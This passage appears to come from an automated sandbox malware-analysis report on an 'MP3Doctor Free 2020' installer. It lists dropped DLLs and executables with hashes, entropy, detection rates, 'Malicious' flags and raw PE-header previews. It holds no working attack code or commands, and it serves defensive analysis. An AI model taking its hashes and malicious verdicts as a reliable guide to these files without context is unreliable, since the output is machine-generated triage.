Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u..j...j...j.......j.......j.. ....j.. ....j.. ....j.. ....j..i....j...j...j..i....j..i....j..i...j...j...j..i....j..Rich.j..................PE..d....kP_.........." .........,...............................................`............`..........................................t..._...........@..........t"...*..x....P.......;..T...........................`;...............................................text............................... ..`.rdata..............................@..@.data...............................@....pdata..t".......$..................@..@.rsrc........@....... ..............@..@.reloc.......P.......&..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\QtAVWidgets1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	248680
Entropy (8bit):	4.820760286569876
Encrypted:	false
SSDEEP:	6144:k6bBPHJr5r5C9Fg8Imnw5bR3Kklo7rbQox:kz
MD5:	60BAB1D197D91828ED25099968F7D8C5
SHA1:	FC8E1B3C2C98727D2D81A8E85420FA80EE655F19
SHA-256:	F682B5AA0AF3CEE93F890EC6717F94C1AC9B75EBFF512955C6531E7CEE05D196
SHA-512:	5B9CBB11E3FCB00FD76F595520DA4610FA37B0F1227D016D77350909846BA33AF9A32B650BB1CE9A73549DB5BF190C2205E28223D1745191B2424F6DC7327B38
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........e..6..6..6..`6..6...7..6...7..6...7..6...7..62..7..6J..7..62..7..6l..7..6..6...6l..7..6l..7..6l..6..6.d6..6l..7..6Rich..6........................PE..d...3N2c.........." ................................................................U....`..........................................&...0..(W..,.... ..................h!..............T...........................`...8............................................text...+........................... ..`.rdata..v'.......(..................@..@.data...x%....... ..................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\avdevice-58.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	135016
Entropy (8bit):	5.674566205873397
Encrypted:	false
SSDEEP:	1536:GZU6fX6Kj693r/67BhRpsGmQhRJRVW8/mpI4Sx8K5aqEkmgcs8MYQJaqEkmgcs8o:GZU6qz3ERpNzhRvVoVDe1r0+
MD5:	61CF5C843D8A31162B59C074AE74A76E
SHA1:	123E0EACE3DD60FEF94DC96215468D22434C50FB
SHA-256:	F51BB73407C96E4A2E3016A96A870FA4B422A8B1851477048D122CCC2D523687
SHA-512:	AA1C3175D9A0E11341B8A2F1C5372E99E1164169C8FC71727A0FE6655878782E921FA046D6A83CA2E2C67DAE0609704442EBCFDBE985281F02DDB7E288DC718D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................2.&......<......>..................qY/....qY1....qY.....8<............8......8=.....8?....Rich............................PE..d...F..].........." ......................................................... ......S.....`.............................................d...............................h!......\...`...8...............................p............................................text............................... ..`.rdata..t...........................@..@.data...a...........................@....pdata..............................@..@.idata..8(.........................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-07TP8.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	31528
Entropy (8bit):	6.472533190412445
Encrypted:	false
SSDEEP:	384:R77JqjlI8icUYWhN5tWcS5gWZoMUekWi9pBj0HRN7RA5aWixHRN7osDhzlGs6N+E:R5D8icUlX5YYMLAWRAlypmPB
MD5:	7EE2B93A97485E6222C393BFA653926B
SHA1:	F4779CBFF235D21C386DA7276021F136CA233320
SHA-256:	BD57D8EEF0BC3A757C5CE5F486A547C79E12482AC8E694C47A6AB794AA745F1F
SHA-512:	4A4A3F56674B54683C88BD696AB5D02750E9A61F3089274FAA25E16A858805958E8BE1C391A257E73D889B1EEA30C173D0296509221D68A492A488D725C2B101
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U..\4~.\4~.\4~...^4~.UL..X4~.Dz.[4~.D}.^4~.\4..v4~.D..Y4~.D{.O4~.D~.]4~.D..]4~.D\|.]4~.Rich\4~.........PE..d...W8.^.........." .........$............................................................`A.........................................>..L....?..x....p.......`..4....:..(A......p...@3..T............................3..0............0..0............................text...(........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata..4....`.......0..............@..@.rsrc........p.......4..............@..@.reloc..p............8..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-0K04O.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	248680
Entropy (8bit):	4.820760286569876
Encrypted:	false
SSDEEP:	6144:k6bBPHJr5r5C9Fg8Imnw5bR3Kklo7rbQox:kz
MD5:	60BAB1D197D91828ED25099968F7D8C5
SHA1:	FC8E1B3C2C98727D2D81A8E85420FA80EE655F19
SHA-256:	F682B5AA0AF3CEE93F890EC6717F94C1AC9B75EBFF512955C6531E7CEE05D196
SHA-512:	5B9CBB11E3FCB00FD76F595520DA4610FA37B0F1227D016D77350909846BA33AF9A32B650BB1CE9A73549DB5BF190C2205E28223D1745191B2424F6DC7327B38
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........e..6..6..6..`6..6...7..6...7..6...7..6...7..62..7..6J..7..62..7..6l..7..6..6...6l..7..6l..7..6l..6..6.d6..6l..7..6Rich..6........................PE..d...3N2c.........." ................................................................U....`..........................................&...0..(W..,.... ..................h!..............T...........................`...8............................................text...+........................... ..`.rdata..v'.......(..................@..@.data...x%....... ..................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-18MLT.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	590632
Entropy (8bit):	6.463330275333709
Encrypted:	false
SSDEEP:	12288:Mt8MRN4gE4x4iTqwTQa6IUqXF7XyxpypsdUDqNSfbQEKZm+jWodEEV3Ho/:MCMm9pyp35bQEKZm+jWodEExg
MD5:	E74CAF5D94AA08D046A44ED6ED84A3C5
SHA1:	ED9F696FA0902A7C16B257DA9B22FB605B72B12E
SHA-256:	3DEDEF76C87DB736C005D06A8E0D084204B836AF361A6BD2EE4651D9C45675E8
SHA-512:	D3128587BC8D62E4D53F8B5F95EB687BC117A6D5678C08DC6B59B72EA9178A7FD6AE8FAA9094D21977C406739D6C38A440134C1C1F6F9A44809E80D162723254
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n..............w.(...#...<........../.....".................+.....g.+.....+...Rich*...................PE..d...R8.^.........." .....>..........p"....................................................`A........................................ m..h....G..,...............(;......(A......4.......T...............................0............P......Ti..@....................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data....:...`..."...P..............@....pdata..(;.......<...r..............@..@.didat..h...........................@....rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-4H4R9.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	660128
Entropy (8bit):	6.339798513733826
Encrypted:	false
SSDEEP:	12288:N2fus43uu43Ry4GHlT4xH2K+M+/i+WSpY+7YOzCaK9A3gS2EKZm+GWodEEwnyh:muJzCaK9AB2EKZm+GWodEEwnyh
MD5:	46060C35F697281BC5E7337AEE3722B1
SHA1:	D0164C041707F297A73ABB9EA854111953E99CF1
SHA-256:	2ABF0AAB5A3C5AE9424B64E9D19D9D6D4AEBC67814D7E92E4927B9798FEF2848
SHA-512:	2CF2ED4D45C79A6E6CEBFA3D332710A97F5CF0251DC194EEC8C54EA0CB85762FD19822610021CCD6A6904E80AFAE1590A83AF1FA45152F28CA56D862A3473F0A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;..h..h..h..[h..h..h..h..Mh..hIAWh..h..Oh..h..qh..h..ph..h..uh..h..Lh..h..Kh..h..Nh..hRich..h................PE..d.....OR.........." .....@...................................................`......a.....`.........................................pU.. ....2..<....@...........G.......>...P.......X..................................p............P...............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data........P...8...B..............@....pdata...G.......H...z..............@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-64K5G.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	data
Category:	dropped
Size (bytes):	3942200
Entropy (8bit):	6.45460826323001
Encrypted:	false
SSDEEP:	49152:9X1kN5mAv+7kHU4A7g9nsHccuooirQCdt35BpZEac2HqGM:gNY2+7OU4i4sHzuooaQCdb/c2HqGM
MD5:	480A4A9CF36788E3B291BCCD13084AE1
SHA1:	798010DF725D0FC8AFC461BDF89D0F32EF2DDE1C
SHA-256:	1E3DF35903970805033C464BB2F3C673DB569932D88C9C090599E16B6D59881B
SHA-512:	8FCAF8DC7EAB5939978F7A151CEC4E52E90B15570F92FA053E09612606F0E88A1777BF249E285DAD60A1A3BA8AE09CFCA06292707BEA5377D43E4BA6019C3998
Malicious:	false
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-64K5G.tmp, Author: Joe Security
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^..........'..........0....................@..........................`<......................................................................................................................................................................text............................... ..`.hhead9.F$.......0..................@..@.data....S... ...0... ..............@....rsrc................P..............@..@.ihead9..@... ..87..................a.\|.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-9A6KK.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20840
Entropy (8bit):	6.3244920295043645
Encrypted:	false
SSDEEP:	384:rk3cFbdBtZHvagGFsGfZyGmGovy8ZpHEi+:rk0vHy9oyiRM
MD5:	D2BC90D6AF120A0643AD5DC5F3CE8D43
SHA1:	419C3246B08125754CCBB4323DD823F8DA0548CB
SHA-256:	BDED78571A2E60B3324AB9B4D3DDB6DE12FC08CB4BBE6A582A2C2292AA17CCE6
SHA-512:	F34C90E44F473A8CD62B75B6D531FDD47AD132A3F1BCE7AD5C0DDF30C61A2454BA214AA2B6CD50C2A1B6CD3AC85F2D9989775376A400D34EBBD2EFAB0FBECC7A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ovA{+./(+./(+./("o.(/./(yb.))./(yb)%./(yb+)#./(yb,)(./(?\|.)../(+..(../(.b)./(.b/)./(.b.(./(.b-)./(Rich+./(........................PE..d....z{c.........." ......... .......................................................7....`..........................................8..t...T;..x....p.......`.......0..h!......<....1...............................2..8............0..(............................text............................... ..`.rdata.......0......................@..@.data........P.......(..............@....pdata.......`.......*..............@..@.rsrc........p.......,..............@..@.reloc..<...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-B37O4.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	397672
Entropy (8bit):	6.4894894939696846
Encrypted:	false
SSDEEP:	12288:W8c9NNNNNNBgjcQFg7jaV95D3+wxech2KJ:tc9NNNNNN+jcQg7jMnD/xech2o
MD5:	B9F3C911728B17FE49BB217D799FCC1A
SHA1:	26F4A963E2F43F46323D8610FEC5E8CC8C4A8A16
SHA-256:	9CEB41F04B48CF7B419C95D03E227F593836D74A04625C0AD5AD2877D7229B65
SHA-512:	0A50270432E6E476D5B4DAF7D9D45053F821BEF02F1872EF598A9E66B2E6B75AE4A89AB97AE175C5143CE3C993D7A354F6389EB5A8BDDBFDE59522103535C403
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.{.%.{.%.{.%.=%.{.%.?%.{.%..%.{.%..%.{.%...%.{.%`.+%.{.%.{.%.{.%..<%.{.%.);%.{.%.{w%.{.%..>%.{.%Rich.{.%........................PE..d......].........." .....8..........................................................g,....`.........................................@...87..x...<.... ...........%......h!...........................................k..p............P...............................text...;6.......8.................. ..`.rdata.......P.......<..............@..@.data...............................@....pdata...%.......&..................@..@_RDATA..P/.......0..................@..@.rsrc........ ......................@..@.reloc..............................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-IK2RF.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	213112
Entropy (8bit):	6.331143352918189
Encrypted:	false
SSDEEP:	3072:V7rtKxzN2HVkkNUq3uUw8SWrBEcsGhLec956+48G+ikgyOzk1kLrTzhvt3GyY:Vr2N253eUw81rBXVevrH+mk12rTlS
MD5:	63D91B407A350DA5CE19B5D79924B1F4
SHA1:	45886A4018B60A5EAB7D4B743F4DF2A9A4318EDC
SHA-256:	22B626313A535C85CE6A097571C53A6E6678A9D4BC5D0DB9F81660ADC7ED366E
SHA-512:	FA06AB2B1AE116BC7AE93EA64D4C258A7149A23C0171C077F0919956101A22A59DD8E3F975C64073319842F01D6183253F637A0EDB514F0C02C9D88B0E65E6CF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u..j...j...j.......j.......j.. ....j.. ....j.. ....j.. ....j..i....j...j...j..i....j..i....j..i...j...j...j..i....j..Rich.j..................PE..d....kP_.........." .........,...............................................`............`..........................................t..._...........@..........t"...*..x....P.......;..T...........................`;...............................................text............................... ..`.rdata..............................@..@.data...............................@....pdata..t".......$..................@..@.rsrc........@....... ..............@..@.reloc.......P.......&..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-JR9V0.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2042352
Entropy (8bit):	7.085275197144553
Encrypted:	false
SSDEEP:	24576:OFZD9URlmDrgBrhEci8XhP3YLd44RS6+FNbqUzUxVvqKGTZnIzudBDFPjQAr10Fu:+ZeLrXFcL0YF7pvtHkfH
MD5:	876A839023B8F962A72D295DA7495734
SHA1:	62A7728679BC18784B1FBF1D013F7CECE18CBEC9
SHA-256:	A757D773DA406411FB977761F6E56F016D48D224AEDAF3D875ED4D4A9EDE6158
SHA-512:	E1B23A2F5EC0100FF874CA075BBD0F90E9065A90FEC66861F99DF603D7AAA9DB8E8EC326710FDC11AD41D01BEFE4EA3077136127ACF613614D0D12FF23BEC6C1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....^............................4.............@..........................@.......................................................p...3..............X............................................................................................text............................... ..`.rdata..x%.......0..................@..@.data....S.......0..................@....rsrc....@...p...@...@..............@..@.vcp1208............................a.G.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-LRHSQ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	869224
Entropy (8bit):	6.632387605957213
Encrypted:	false
SSDEEP:	24576:DJf34ppw4hjg401r+iTy2mmzuF3SJciti0ZIj8UoJwCR:Dl3ypw4yN/RiF3SJdO8xJv
MD5:	DAA904CE63B0A290111AED5E843B9368
SHA1:	6642AD5C2622D756EB3500E7C0420E9DA7A16BB1
SHA-256:	471BBC3FA0A98869F6791E0D1A55B38F5E360842A7CC219A6FF26030E62DBB1B
SHA-512:	CBFD06523F1855AAF4BE2D33EB3A3A324C8D7AF4871B314AC2C165FD17F8DA6CD2F465E9405412282AAC1ED247B811A4A73D91069A324A5AEC531253AE3A4D0B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.9d0.W70.W70.W7...73.W70.V7m.W7.M.71.W7v..7..W7v..7..W7v..7$.W7.s.7e.W70.W7'.W7.s.71.W7=..71.W7.s.71.W7Rich0.W7........PE..d......].........." .....8...........\...............................................$....`.................................................\|...(....`..........x]..."..h!...p.......R..8...............................p............P..H............................text...7+.......,.................. ..`.rodata......@.......0.............. ..`.rdata..FP...P...R...<..............@..@.data... K.......&..................@....pdata..x].......^..................@..@.rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-NPF14.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	963232
Entropy (8bit):	6.634408584960502
Encrypted:	false
SSDEEP:	24576:FkZ+EUPoH5KTcAxt/qvRQdxQxO61kCS9mmWymzVPD:FkMAlM8ixQI5C6wl
MD5:	9C861C079DD81762B6C54E37597B7712
SHA1:	62CB65A1D79E2C5ADA0C7BFC04C18693567C90D0
SHA-256:	AD32240BB1DE55C3F5FCAC8789F583A17057F9D14914C538C2A7A5AD346B341C
SHA-512:	3AA770D6FBA8590FDCF5D263CB2B3D2FAE859E29D31AD482FBFBD700BCD602A013AC2568475999EF9FB06AE666D203D97F42181EC7344CBA023A8534FB13ACB7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ck.."..".."..D...".."..-"...s..$ ...s.."...s.."...s.. "...s.."...s.."...s.."..Rich."..........................PE..d.....OR.........." .....h...:.......)..............................................].....`.................................................@...(............@...s...t...>......8...p................................2..p............................................text....g.......h.................. ..`.rdata...8.......:...l..............@..@.data...hu.......D..................@....pdata...s...@...t..................@..@.rsrc................^..............@..@.reloc..8............b..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-O6M3F.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	469624
Entropy (8bit):	6.027128925039679
Encrypted:	false
SSDEEP:	6144:g814pr+wMrppkALmug7u7ozC/B4OvCH9UYHeAeBC:u9+wAkAS2j/B4BryC
MD5:	820FFF478DC5F2C2D5F03A5DB9187FBC
SHA1:	BD58AA8596345C837E1743617452EC7D73013F3A
SHA-256:	3DC976E86D64881E0F37A54B5A04E903235E94D858889B1261527F0048CFBC03
SHA-512:	1476919C5C133ACA519B9E9BE2684A85C7E669FA43942204ACDD9EC4A40577F966AD17D30A7EBD3A97A871E71178F0058966410A934822B96F0B2D7120AA43CB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m>W.)_9.)_9.)_9. '../_9..28.+_9..2<.?_9..2=.!_9..2:.*_9.r7=.(_9.r78.%_9..18.,_9.)_8.._9..1<.&_9..19.(_9..1.(_9.)_..(_9..1;.(_9.Rich)_9.........PE..d...G.P_.........." .................................................................[....`.........................................0d...:...................p...K......x.......h....B..T...................8D..(...0C...............0...............................text...t........................... ..`.rdata.......0....... ..............@..@.data..............................@....pdata...K...p...L..................@..@.rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-P12J5.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	135016
Entropy (8bit):	5.674566205873397
Encrypted:	false
SSDEEP:	1536:GZU6fX6Kj693r/67BhRpsGmQhRJRVW8/mpI4Sx8K5aqEkmgcs8MYQJaqEkmgcs8o:GZU6qz3ERpNzhRvVoVDe1r0+
MD5:	61CF5C843D8A31162B59C074AE74A76E
SHA1:	123E0EACE3DD60FEF94DC96215468D22434C50FB
SHA-256:	F51BB73407C96E4A2E3016A96A870FA4B422A8B1851477048D122CCC2D523687
SHA-512:	AA1C3175D9A0E11341B8A2F1C5372E99E1164169C8FC71727A0FE6655878782E921FA046D6A83CA2E2C67DAE0609704442EBCFDBE985281F02DDB7E288DC718D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................2.&......<......>..................qY/....qY1....qY.....8<............8......8=.....8?....Rich............................PE..d...F..].........." ......................................................... ......S.....`.............................................d...............................h!......\...`...8...............................p............................................text............................... ..`.rdata..t...........................@..@.data...a...........................@....pdata..............................@..@.idata..8(.........................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-PS7GC.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	51
Entropy (8bit):	3.48286657951254
Encrypted:	false
SSDEEP:	3:cUoytoUD6MBomFUT:cUoQoUD6Qoyy
MD5:	034D89CD2C41EDFCEADA9F96A3C0A56A
SHA1:	92AB4E6FF98CA987D56EA3C1BA36D1C61EF23ACB
SHA-256:	44BBE94D481B106F00223DD406D015AEFD00CFA2DBA9428BEFC2B8F6A3FEB971
SHA-512:	6C3E701D2D0FD24FDB46C0E1B0EF5245F36E4A34A9D2340665A31F6331C2D6F08680399600FB02C3D51694F9BAFFB3E41A367CB4FE945D4836B669DA63EB6358
Malicious:	false
Preview:	1 1..4 3..3 2..16 9..6 5..468 60..728 90..2592 1936

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-QM7CF.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	320120
Entropy (8bit):	6.398399631689542
Encrypted:	false
SSDEEP:	6144:bSU6+JAfisltPzYzrIybvaEezwMckNI+STEDv4nk3ad04ZqhKTrg+COv:brAltbYzsOvaWJ
MD5:	DB19F6E0A1BB5DB1C8D87C3FE0891136
SHA1:	3B2DAB478A8268000EF5E4474D52CB71F9EB615E
SHA-256:	7623B596CFD989413FEA2FE355607B029EF8E64067275CBF81863688128738B0
SHA-512:	B328DC6D1ADE3061894BC5C50F437B732190DE3CEA6D2CDC147A9A8193EE73221937FBA24209B66226D5E4B05DFFF5A79DB8B134373D1218605BCBA6EE82A6B3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~@hB:!..:!..:!..3Y..2!...L..8!..aI..8!...L..,!...L..2!...L..9!...O..=!..:!..."...O../!...O..;!...O..;!..:!..;!...O..;!..Rich:!..........................PE..d....lP_.........." .....\...v......$_...................................................`..........................................5...........................,......x.......\|...P...T.......................(....................p..p............................text....[.......\.................. ..`.rdata..."...p...$...`..............@..@.data...8...........................@....pdata...,..........................@..@.rsrc...............................@..@.reloc..\|...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-QTE9G.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	ASCII text
Category:	dropped
Size (bytes):	1297
Entropy (8bit):	5.115489615345492
Encrypted:	false
SSDEEP:	24:CbUneZXof9+bOOrXqFT09+JYrXqFTzl796432s4EOkUs8QROJ32s3yxsITf+3t1e:Cn3OOrXqJ07rXqJzr6432sv832s3EsI/
MD5:	AAF4009F5963B1B270D8C3E697EBE442
SHA1:	F5A44235094DA0B8B5992C6112CB8C356EF22B93
SHA-256:	3988CDCCB878675B4AB8C11F21EF7F6301451F59E2E2BF3F07E963D36C8E9767
SHA-512:	BC30F4C5F17E4F0CDE2CDD5C36A6EC28271569E18808E736186D42409564E3E6FFA8AD23842912C90F39CE6264A698714A434092778C74CBDE6C330DD3969109
Malicious:	false
Preview:	Copyright (c) 2013, Cisco Systems.All rights reserved...Redistribution and use in source and binary forms, with or without modification,.are permitted provided that the following conditions are met:..* Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...* Redistributions in binary form must reproduce the above copyright notice, this. list of conditions and the following disclaimer in the documentation and/or. other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE.DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR.ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES.(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERV

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-RPUL3.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	331384
Entropy (8bit):	6.387255143196498
Encrypted:	false
SSDEEP:	6144:cOjmvCPMfXfCsXL0hq+SNcFxkqSj1ZBtp:fcC05tp
MD5:	C3424F2D3D26632C341EF2F542AEA36B
SHA1:	30640EBFF046085DBA3BD0877DE8A90886BED945
SHA-256:	FB0BD60A7D0178C62CFD14D53B40AD47E8F68DB68B95C625723CADC1CD3A1A3E
SHA-512:	72D9A32433DA38CFB752A67C5F903F3480871FCBD16DC5999FB970313079652CF7AEB481DA6097879B641A0E76271118C6E82406DD14C9C90C7460BA6A71BDC7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........O...........8...................................W............W.....W.....W.T.....<....W.....Rich...........................PE..d...z.P_.........." .........................................................@....../.....`..................................................*....... ...........1......x....0..8....N..T...................XP..(...PO...............................................text............................... ..`.rdata.............................@..@.data...............................@....pdata...1.......2..................@..@.rsrc........ ......................@..@.reloc..8....0......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-TJFT6.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	707354
Entropy (8bit):	6.472733501771484
Encrypted:	false
SSDEEP:	12288:C0QfKb7nH5lrPo37AzHTA63I0ihE4aEJOrNv4gM/RelAseY/XExy8J:yfKbT5lrPo37AzHTA63/cfa74F0lAi/q
MD5:	D790DAB935B81DC923E76A50FF0A20EF
SHA1:	FE08768E29D86C392F80EEFCC38E23971844A61E
SHA-256:	6587B61223FF1C184C0A5B153846B0229771AEE05F7AA74A82CBB4099A48A596
